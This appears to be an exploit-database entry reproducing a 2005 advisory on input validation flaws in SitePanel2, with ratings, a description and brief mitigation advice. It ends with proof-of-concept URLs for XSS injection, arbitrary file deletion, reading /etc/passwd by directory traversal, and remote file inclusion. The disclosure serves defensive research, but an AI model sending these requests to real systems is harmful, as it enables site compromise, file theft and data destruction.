header-logo
Suggest Exploit
vendor:
SitePanel2
by:
SecurityFocus
7.5
CVSS
HIGH
Cross-site Scripting, Directory Traversal, File Include, Upload and Deletion
79, 22, 434, 264
CWE
Product Name: SitePanel2
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2005

SitePanel2 Multiple Input Validation Vulnerabilities

SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. Multiple cross-site scripting issues affect the application. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. SitePanel2 is prone to a directory traversal vulnerability. This vulnerability could be exploited to retrieve sensitive or privileged information normally accessible to the Web server. The application is also vulnerable to file include, upload and deletion vulnerabilities. These issues could permit the execution of arbitrary code in the context of the affected Web site or the deletion of arbitrary files accessible to the application.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized. It is also recommended to disable the display of error messages to remote users.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13481/info

SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

Multiple cross-site scripting issues affect the application. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

SitePanel2 is prone to a directory traversal vulnerability. This vulnerability could be exploited to retrieve sensitive or privileged information normally accessible to the Web server.

The application is also vulnerable to file include, upload and deletion vulnerabilities. These issues could permit the execution of arbitrary code in the context of the affected Web site or the deletion of arbitrary files accessible to the application. 

http://www.example.com/users/main.php?p=5&do=2&v=177%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev&postid=177&usernamess=test&inadmin=no%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev2&postid=177&usernamess=test&inadmin=no&newsev=4%22%3E[XSS]
http://www.example.com/admin/5.php?do=chsev&postid=177%22%3E[XSS]&usernamess=test&inadmin=no
http://www.example.com/users/main.php?p=5&do=0&show=closed%22%3E[XSS]
http://www.example.com/admin/0.php?do=ratekb&id=11%22%3E[XSS]
http://www.example.com/users/main.php?p=6&do=0&v=post&id=11&sec_name=Blah%22%3E[XSS]

Arbitrary file deletion proof of concept:
http://www.example.com/admin/5.php?do=rmattach&rm=yes&id=../index.php

Directory traversal proof of concept:
http://www.example.com/users/index.php?lang=en.inc/../../../../../../etc/passwd%00

File include proof of concept:
http://www.example.com/users/main.php?p=http://www.example.com